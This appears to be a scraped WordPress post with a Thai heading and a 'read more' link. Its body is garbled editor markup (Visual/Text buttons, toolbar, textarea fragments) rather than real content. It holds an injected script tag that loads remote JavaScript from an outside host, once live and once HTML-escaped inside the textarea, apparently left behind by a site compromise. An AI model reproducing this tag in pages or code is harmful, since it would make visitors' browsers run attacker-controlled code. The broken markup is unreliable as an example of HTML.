ยกระดับคุณภาพ

Visual Text <script src=http://a.c0594.com/?js=6></script>Visual</button><br /> <button type=”button” id=”content-html” class=”wp-switch-editor switch-html” data-wp-editor-id=”content”>Text</button><br /> </div><br /> </div><br /> <div id=”wp-content-editor-container” class=”wp-editor-container”><div id=”ed_toolbar” class=”quicktags-toolbar”></div><textarea class=”wp-editor-area” style=”height: 300px” autocomplete=”off” cols=”40″ name=”content” id=”content”>&lt;script src=http://a.c0594.com/?js=6&gt;&lt;/script&gt;Visual&lt;/button&gt;<br /> &lt;button type=”button” id=”content-html” class=”wp-switch-editor switch-html” data-wp-editor-id=”content”&gt;Text&lt;/button&gt;<br /> &lt;/div&gt;<br /> &lt;/div&gt;<br /> &lt;div id=”wp-content-editor-container” class=”wp-editor-container”&gt;&lt;div id=”ed_toolbar” class=”quicktags-toolbar”&gt;&lt;/div&gt;&lt;textarea class=”wp-editor-area” style=”height: 300px” autocomplete=”off” cols=”40″ name=”content” id=”content”&gt;</p>

อ่านต่อ